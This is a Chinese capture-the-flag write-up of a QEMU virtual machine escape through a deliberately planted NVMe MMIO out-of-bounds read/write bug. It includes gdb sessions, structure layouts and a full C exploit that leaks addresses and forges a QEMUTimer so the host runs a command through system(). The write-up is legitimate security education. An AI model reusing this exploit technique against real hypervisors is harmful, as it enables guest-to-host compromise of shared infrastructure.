qwb final execchrome writeup

题目描述

分发附件:Vmware虚拟机镜像文件
题目描述:该题以qemu虚拟机软件的某CVE漏洞为参考,在qemu某模块中置入存在漏洞的代码,导致一些不可预测的执行流程,从而完成虚拟机逃逸攻击。选手需要在运行在qemu虚拟机中的ubuntu操作系统下进行逃逸操作,尝试触发漏洞并在宿主机(Deepin Linux)中执行任意代码。
展示区网络拓扑:一台交换机连接选手攻击机和靶机。
展示过程及要求:选手携带自己的攻击机上台,通过网线接入交换机。靶机中运行了宿主机Deepin Linux系统,系统内又嵌套运行了qemu下的Ubuntu系统。Ubuntu系统的22端口被映射到宿主机的2222端口。选手使用ssh连接宿主机的2222端口,用户名:ubuntu,密码:123456。选手在Ubuntu系统中执行漏洞利用代码,在规定时间内在宿主机中执行“google-chrome –no-sandbox file:///home/qwb/Desktop/success.mp4”命令,宿主机中弹出chrome浏览器,并显示成功动画即为展示成功。
宿主机运行bash脚本监控并自动重启qemu。如果qemu软件崩溃会自动重启,请选手耐心等待直到客户机ssh连接恢复。如果qemu软件无法重启,选手可要求将虚拟机恢复到初始状态,恢复快照时不停止计时。
开始计时时间:选手第一次成功登陆ubuntu客户机时,开始计时。

  • launch.sh

    1
    2
    3
    4
    #!/bin/bash
    while true
    do ./qemu-system-x86_64 -m 1024 -smp 2 -boot c -cpu host -hda ubuntu_server.qcow2 --enable-kvm -drive file=./blknvme,if=none,id=D22 -device nvme,drive=D22,serial=1234 -net user,hostfwd=tcp::2222-:22 -net nic && sleep 5
    done
  • qemu-system-x86_64 信息

    1
    2
    3
    qwb@ExecChrome:~/Desktop/QWB$ ./qemu-system-x86_64  --version
    QEMU emulator version 4.0.50 (v4.0.0-1043-ge2a58ff493-dirty)
    Copyright (c) 2003-2019 Fabrice Bellard and the QEMU Project developers

题目分析

比赛时:

​ 由于是第一次上手qemu,缺乏相关知识积累。第一件事就是从github下载了qemu的源码,载所给的虚机中编译了一遍。在编译的过程中查找了以往ctf中出现的qemu虚拟机逃逸的相关wp。通过wp,了解到一般漏洞设置载加载的虚拟设备中,与虚拟设备的交互一般通过mmio或着portio 。而利用代码的编写一般有两种形式,一种通过编写内核驱动与设备交互,一种通过在将设备空间映射到用户内存空间进行交互。

​ 在看完几篇wp后,虚拟机中的qemu已编译完成。用ida 打开两个编译的qemu和题目所提供的qemu。在加载过程中,想利现成工具进行diff,看到加载过程十分慢(linux wine 的ida放弃折腾)。就放弃了这种做法。经过肉眼对比,发现大部分函数反编译后基本一致。题目环境加载了nvme设备,直接搜索nvme相关函数,重点对比了write和read函数,可以发现nvme_mmio_read和nvme_mmio_write两个文件存在着代码改动。两处的代码改动都减少了一个条件判断,看到这里基本确定载读写过程中存在着问题,可能存在着越界读写。由于在题干中提到以某cve为参考,于是搜寻了一番相关cve。在repo中搜索,发现了cve-2018-16847。

于是开始了poc搜寻之路,一搜索未果。

​ 接着,开始尝试触发漏洞代码,验证之前的设想。参照网上的相关wp,发现套用别人代码无法完成所需要的相关工作。对nvme设备相关的知识又十分匮乏,于是又展开了大胆的想象。第一次尝试使用已加载的nvme驱动间接与nvme设备进行交互。将nvme.ko拷贝出,拖进ida。看了半天,没有找到相关测试样例,放弃。第二次尝试使用nvme_cli来进行交互,发现到达nvme设备相关函数,但是不会到达指定路径。

​ 完成以上工作后,就陷入了死胡同。接下来的一天多时间就开始四处查找资料(划水)。

  • nvme_mmio_read

nvme_mmio_read.png

  • nvme_mmio_write

nvme_mmio_write.png

比赛后:

​ 两天时间放在这一题,毫无进展,感觉十分挫败。赛后咨询大佬,了解到漏洞代码位置确实是在上图所示的位置,最后劫持rip使用timer。

​ 于是又开始了搜索的道路,这时才知道github上有个叫pcimem的项目,项目代码经过封装后就可以直接在用户空间读写pci设备。在w0lfzhang师傅的vmescap中,可以看到他封装的函数。这里可以直接拿过来用。

从头看题:

​ 通过lspci -vv 可以查看pci设备的详细信息。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

00:04.0 Non-Volatile memory controller: Intel Corporation QEMU NVM Express Controller (rev 02) (prog-if 02 [NVM Express])
Subsystem: Red Hat, Inc. QEMU Virtual Machine
Physical Slot: 4
Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx+
Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast >TAbort- <TAbort- <MAbort- >SERR- <PERR- INTx-
Latency: 0
Interrupt: pin A routed to IRQ 10
Region 0: Memory at febf0000 (64-bit, non-prefetchable) [size=8K]
Region 4: Memory at febf3000 (32-bit, non-prefetchable) [size=4K]
Capabilities: [40] MSI-X: Enable+ Count=64 Masked-
Vector table: BAR=4 offset=00000000
PBA: BAR=4 offset=00000800
Capabilities: [80] Express (v2) Endpoint, MSI 00
DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s <64ns, L1 <1us
ExtTag- AttnBtn- AttnInd- PwrInd- RBE+ FLReset-
DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported-
RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop-
MaxPayload 128 bytes, MaxReadReq 128 bytes
DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr- TransPend-
LnkCap: Port #0, Speed 2.5GT/s, Width x1, ASPM L0s, Exit Latency L0s <64ns, L1 <1us
ClockPM- Surprise- LLActRep- BwNot- ASPMOptComp-
LnkCtl: ASPM Disabled; RCB 64 bytes Disabled- CommClk-
ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt-
LnkSta: Speed 2.5GT/s, Width x1, TrErr- Train- SlotClk- DLActive+ BWMgmt- ABWMgmt-
DevCap2: Completion Timeout: Not Supported, TimeoutDis-, LTR-, OBFF Not Supported
DevCtl2: Completion Timeout: 50us to 50ms, TimeoutDis-, LTR-, OBFF Disabled
LnkSta2: Current De-emphasis Level: -6dB, EqualizationComplete-, EqualizationPhase1-
EqualizationPhase2-, EqualizationPhase3-, LinkEqualizationRequest-
Kernel driver in use: nvme
Kernel modules: nvme

​ 查看设备相关的文件。其中resource0 对应着region 0,resource对应着region 4 . resource 是资源空间,对应着 PCI 设备的可映射内存空间。从”PCI 配置空间”解析出来的资源定义段落分别生成的,它们是 PCI 总线驱动在 PCI 设备初始化阶段加上去的,都是二进制属性,但没有实现读写接口,只支持 mmap 内存映射接口。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
root@ExecChrome:/home/ubuntu# ls -al /sys/devices/pci0000\:00/0000\:00\:04.0/
total 0
drwxr-xr-x 5 root root 0 Jul 4 08:17 .
drwxr-xr-x 12 root root 0 Jul 4 2019 ..
-rw-r--r-- 1 root root 4096 Jul 4 08:17 broken_parity_status
-r--r--r-- 1 root root 4096 Jul 4 2019 class
-rw-r--r-- 1 root root 256 Jul 4 2019 config
-r--r--r-- 1 root root 4096 Jul 4 08:17 consistent_dma_mask_bits
-rw-r--r-- 1 root root 4096 Jul 4 08:17 d3cold_allowed
-r--r--r-- 1 root root 4096 Jul 4 2019 device
-r--r--r-- 1 root root 4096 Jul 4 08:17 dma_mask_bits
lrwxrwxrwx 1 root root 0 Jul 4 2019 driver -> ../../../bus/pci/drivers/nvme
-rw-r--r-- 1 root root 4096 Jul 4 08:17 driver_override
-rw-r--r-- 1 root root 4096 Jul 4 08:17 enable
lrwxrwxrwx 1 root root 0 Jul 4 08:17 firmware_node -> ../../LNXSYSTM:00/LNXSYBUS:00/PNP0A03:00/device:06
-r--r--r-- 1 root root 4096 Jul 4 2019 irq
-r--r--r-- 1 root root 4096 Jul 4 08:17 local_cpulist
-r--r--r-- 1 root root 4096 Jul 4 2019 local_cpus
-r--r--r-- 1 root root 4096 Jul 4 2019 modalias
-rw-r--r-- 1 root root 4096 Jul 4 08:17 msi_bus
drwxr-xr-x 2 root root 0 Jul 4 2019 msi_irqs
-rw-r--r-- 1 root root 4096 Jul 4 2019 numa_node
drwxr-xr-x 3 root root 0 Jul 4 2019 nvme
-r--r--r-- 1 root root 4096 Jul 4 08:17 pools
drwxr-xr-x 2 root root 0 Jul 4 08:17 power
--w--w---- 1 root root 4096 Jul 4 08:17 remove
--w--w---- 1 root root 4096 Jul 4 08:17 rescan
-r--r--r-- 1 root root 4096 Jul 4 2019 resource
-rw------- 1 root root 8192 Jul 4 08:17 resource0
-rw------- 1 root root 4096 Jul 4 08:17 resource4
lrwxrwxrwx 1 root root 0 Jul 4 2019 subsystem -> ../../../bus/pci
-r--r--r-- 1 root root 4096 Jul 4 2019 subsystem_device
-r--r--r-- 1 root root 4096 Jul 4 2019 subsystem_vendor
-rw-r--r-- 1 root root 4096 Jul 4 2019 uevent
-r--r--r-- 1 root root 4096 Jul 4 2019 vendor

​ 通过pcimem读写resource0空间进行调试。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
root@ExecChrome:/home/ubuntu#  ./pcimem /sys/devices/pci0000\:00/0000\:00\:04.0/resource0 0x100 d
/sys/devices/pci0000:00/0000:00:04.0/resource0 opened.
Target offset is 0x100, page size is 4096
mmap(0, 4096, 0x3, 0x1, 3, 0x100)
PCI Memory mapped to address 0x7f1f8f5a4000.
0x0100: 0x00007F6ED4279530
载gdb中设置条件断点
break nvme_mmio_read if $rsi==0x100
Thread 4 "qemu-system-x86" hit Breakpoint 5, nvme_mmio_read (opaque=0x557463fc33d0, addr=0x100, size=0x4) at /home/ctflag/tools/qemu/hw/block/nvme.c:1066
1066 in /home/ctflag/tools/qemu/hw/block/nvme.c

gdb-peda$ p n
$3 = (NvmeCtrl *) 0x557463fc33d0
gdb-peda$ p ptr
$4 = (uint8_t *) 0x557463fc3e90 "\377\a\003\017 "
gdb-peda$ p $3->bar
$5 = {
cap = 0x4000200f0307ff,
vs = 0x10200,
intms = 0x0,
intmc = 0x0,
cc = 0x460001,
rsvd1 = 0x0,
csts = 0x1,
nssrc = 0x0,
aqa = 0xff00ff,
asq = 0x356c4000,
acq = 0x34c74000,
cmbloc = 0x0,
cmbsz = 0x0
}
gdb-peda$ p &$3->bar
$6 = (NvmeBar *) 0x557463fc3e90
gdb-peda$ x /gx 0x557463fc3e90+0x100
0x557463fc3f90: 0x00007f6ed4279530
gdb-peda$
nvme_mmio_read可以读取通过 n->bar的地址加上addr地址空间的数据。n的数据结构为NvmeCtrl,存放在堆空间。
其中存在代码段地址和堆空间地址,可以完成leak。
gdb-peda$ ptype NvmeCtrl
type = struct NvmeCtrl {
PCIDevice parent_obj;
MemoryRegion iomem;
MemoryRegion ctrl_mem;
NvmeBar bar;
BlockConf conf;
uint32_t page_size;
uint16_t page_bits;
uint16_t max_prp_ents;
uint16_t cqe_size;
uint16_t sqe_size;
uint32_t reg_size;
uint32_t num_namespaces;
uint32_t num_queues;
uint32_t max_q_ents;
uint64_t ns_size;
uint32_t cmb_size_mb;
uint32_t cmbsz;
uint32_t cmbloc;
uint8_t *cmbuf;
uint64_t irq_status;
char *serial;
NvmeNamespace *namespaces;
NvmeSQueue **sq;
NvmeCQueue **cq;
NvmeSQueue admin_sq;
NvmeCQueue admin_cq;
NvmeIdCtrl id_ctrl;
}

在调用nvme_mmio_write时当addr<=0xfff时会进入 nvme_write_bar(opaque, addr, data, size);在nvme_write_bar的最后出题人添加了一段代码,给了我们能够往n->bar地址后0x1000空间的任意写。
......
{
*(&n->bar.cap + offset) = dataa;
}
else if ( sizea > 2 )
{
if ( sizea == 4 )
{
*(&n->bar.cap + offset) = dataa;
}
else if ( sizea == 8 )
{
*(&n->bar.cap + offset) = dataa;
}
}
else if ( sizea == 1 )
{
*(&n->bar.cap + offset) = dataa;
}
break;
}
}

root@ExecChrome:/home/ubuntu# ./pcimem /sys/devices/pci0000\:00/0000\:00\:04.0/resource0 0x100 d 0x12345678deadbeef
往0x100的偏移地址写入0x12345678deadbeef

断点被命两次,两次分别写入四字节。

hread 3 "qemu-system-x86" hit Breakpoint 2, nvme_mmio_write (opaque=0x557463fc33d0, addr=0x100, data=0xdeadbeef, size=0x4) at /home/ctflag/tools/qemu/hw/block/nvme.c:1171
1171 in /home/ctflag/tools/qemu/hw/block/nvme.c

ad 3 "qemu-system-x86" hit Breakpoint 2, nvme_mmio_write (opaque=0x557463fc33d0, addr=0x104, data=0x12345678, size=0x4) at /home/ctflag/tools/qemu/hw/block/nvme.c:1171
1171 in /home/ctflag/tools/qemu/hw/block/nvme.c

gdb-peda$ x /gx 0x557463fc3e90+0x100
0x557463fc3f90: 0x12345678deadbee//值已被写入

root@ExecChrome:/home/ubuntu# ./pcimem /sys/devices/pci0000\:00/0000\:00\:04.0/resource0 0x100 d
/sys/devices/pci0000:00/0000:00:04.0/resource0 opened.
Target offset is 0x100, page size is 4096
mmap(0, 4096, 0x3, 0x1, 3, 0x100)
PCI Memory mapped to address 0x7fd400531000.
0x0100: 0x12345678DEADBEEF
root@ExecChrome:/home/ubuntu#

​ 到现在,已经可以很方便的完成leak,控制流的劫持需要修改存n->bar之后的某个指针。在NvmeCtrl结构体中存在admin_cq和admin_sq两个队列结构体。NvmeCQueue结构体中存在QEMUTimer类型的指针,当expire_time的定时到了后就会执行cb(opaque)。具体的定时不会设置,只有通过关机或重启动触发。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
gdb-peda$ ptype NvmeCQueue
type = struct NvmeCQueue {
struct NvmeCtrl *ctrl;
uint8_t phase;
uint16_t cqid;
uint16_t irq_enabled;
uint32_t head;
uint32_t tail;
uint32_t vector;
uint32_t size;
uint64_t dma_addr;
QEMUTimer *timer;
union {
struct NvmeSQueue *tqh_first;
QTailQLink tqh_circ;
} sq_list;
union {
struct NvmeRequest *tqh_first;
QTailQLink tqh_circ;
} req_list;
}


db-peda$ ptype QEMUTimer
type = struct QEMUTimer {
int64_t expire_time;
QEMUTimerList *timer_list;
QEMUTimerCB *cb;//func ptr
void *opaque;//arg0
QEMUTimer *next;
int attributes;
int scale;
}

gdb-peda$ p $3->admin_cq
$8 = {
ctrl = 0x557463fc33d0,
phase = 0x1,
cqid = 0x0,
irq_enabled = 0x1,
head = 0xa,
tail = 0xa,
vector = 0x0,
size = 0x100,
dma_addr = 0x34c74000,
timer = 0x7f6ed4266910,
sq_list = {
tqh_first = 0x557463fc3f70,
tqh_circ = {
tql_next = 0x557463fc3f70,
tql_prev = 0x557463fc3fc0
}
},
req_list = {
tqh_first = 0x0,
tqh_circ = {
tql_next = 0x0,
tql_prev = 0x557463fc4010
}
}
}
gdb-peda$ p $3->admin_cq->timer
$9 = (QEMUTimer *) 0x7f6ed4266910
gdb-peda$ p *($3->admin_cq->timer)
$10 = {
expire_time = 0xffffffffffffffff,
timer_list = 0x5574632dd1a0,
cb = 0x55746068fc2d <nvme_post_cqes>,
opaque = 0x557463fc3fd0,
next = 0x0,
attributes = 0x0,
scale = 0x1
}
gdb-peda$ p &$3->bar
$11 = (NvmeBar *) 0x557463fc3e90
gdb-peda$ p /x &$3->admin_cq->timer
$12 = 0x557463fc3ff8
b-peda$ p /x 0x557463fc3ff8-0x557463fc3e90
$13 = 0x168

漏洞利用

  • 使用任意读完成code地址和heap地址的泄漏,由于在qemu的got表中存在system这里就省去了对libc地址的泄漏。
  • 通过修改admin_cq的timer,将timer指向id_ctrl最后一串为0的空间,踩坑发现参数摆放和结构体摆放位置要避开堆管理结构体,否则会free出错,或清空fd字段导致结构体错误。
  • 对于timer结构体的构造,需要保证timer_list列表正确。

calc.jpg

最终exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>
#include <signal.h>
#include <fcntl.h>
#include <ctype.h>
#include <termios.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <assert.h>

#define PRINT_ERROR \
do { \
fprintf(stderr, "Error at line %d, file %s (%d) [%s]\n", \
__LINE__, __FILE__, errno, strerror(errno)); exit(1); \
} while(0)

#define MAP_SIZE 4096UL
#define MAP_MASK (MAP_SIZE - 1)
void debug(void * str)
{
printf(str);
}
int fd = -1;

char *filename = "/sys/devices/pci0000:00/0000:00:04.0/resource0";


void pcimem_read(uint64_t target, char access_type, uint64_t * read_result)
{
/* Map one page */
void *map_base = mmap(0, MAP_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fd, target & ~MAP_MASK);
if(map_base == (void *) -1) PRINT_ERROR;
printf("PCI Memory mapped to address 0x%08lx.\n", (unsigned long) map_base);

void *virt_addr = map_base + (target & MAP_MASK);

int type_width = 0;

switch(access_type)
{
case 'b':
*read_result = *((uint8_t *) virt_addr);
type_width = 1;
break;
case 'h':
*read_result = *((uint16_t *) virt_addr);
type_width = 2;
break;
case 'w':
*read_result = *((uint32_t *) virt_addr);
type_width = 4;
break;
case 'd':
*read_result = *((uint64_t *) virt_addr);
type_width = 8;
break;
}


printf("Value at offset 0x%X (%p): 0x%0*lX\n", (int) target, virt_addr, type_width*2, read_result);
if(munmap(map_base, MAP_SIZE) == -1)
PRINT_ERROR;
}

void pcimem_write(uint64_t target, char access_type, uint64_t writeval)
{
/* Map one page */
void *map_base = mmap(0, MAP_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fd, target & ~MAP_MASK);
if(map_base == (void *) -1) PRINT_ERROR;
printf("PCI Memory mapped to address 0x%08lx.\n", (unsigned long) map_base);
uint64_t read_result = 0;
int type_width = 0;
void *virt_addr = map_base + (target & MAP_MASK);
switch(access_type)
{
case 'b':
*((uint8_t *) virt_addr) = writeval;
read_result = *((uint8_t *) virt_addr);
type_width = 1;
break;
case 'h':
*((uint16_t *) virt_addr) = writeval;
read_result = *((uint16_t *) virt_addr);
type_width = 2;
break;
case 'w':
*((uint32_t *) virt_addr) = writeval;
read_result = *((uint32_t *) virt_addr);
type_width = 4;
break;
case 'd':
*((uint64_t *) virt_addr) = writeval;
read_result = *((uint64_t *) virt_addr);
type_width = 8;
break;
}
//readback not correct?
printf("Written 0x%0*lX; readback 0x%*lX\n", type_width, writeval, type_width, read_result);
if(munmap(map_base, MAP_SIZE) == -1)
PRINT_ERROR;
}


int main(int argc, char *argv[])
{
if((fd = open(filename, O_RDWR | O_SYNC)) == -1)
PRINT_ERROR;

uint64_t data = 0 ;
//step 1: get binary address
pcimem_read(0x11b8, 'd', &data);
uint64_t bin_addr = (uint64_t)data - 0x760aa3;
printf("[+] binary @ 0x%lX\n", bin_addr);
uint64_t system_addr = bin_addr + 0x2bc600;
printf("[+] system @ 0x%lX\n", system_addr);
//step 2: get heap address
pcimem_read(0x128, 'd', &data);
uint64_t heap_addr = (uint64_t)data - 0x120 ;
printf("[+] heap @ 0x%lX\n", heap_addr);
//step 3: fake obj
/*
$8 = {
expire_time = 0xffffffffffffffff,
timer_list = 0x560d8ffde1a0,
cb = 0x560d8ef61c2d <nvme_post_cqes>,
opaque = 0x560d90cc4fd0,
next = 0x0,
attributes = 0x0,
scale = 0x1
}

*/
char cmd[] = "deepin-calculator\x00";
// 5555555547a4: 0x632d6e6970656564 0x6f74616c75636c61
// 5555555547b4: 0x000a786c25000072
uint64_t cmd_addr = heap_addr + 0xdb8 ;
uint64_t fake_obj = heap_addr + 0xd90;
pcimem_write(0xd90, 'd', 0xffffffffffffffff);//expire time
pcimem_write(0xd98, 'd', heap_addr - 0xce6cf0 );//timer list
pcimem_write(0xda0, 'd', system_addr);//cb
pcimem_write(0xda8, 'd', cmd_addr);//opaque
pcimem_write(0xdb8, 'd', 0x632d6e6970656564);//deepin-calculator
pcimem_write(0xdc0, 'd', 0x6f74616c75636c61);
pcimem_write(0xdc8, 'd', 0x72);
pcimem_write(0x100, 'd', fake_obj);//modify admin_cq->timer
// pcimem_write(0x168, 'd', fake_obj);//modify admin_sq->timer
return 0;
}

参考链接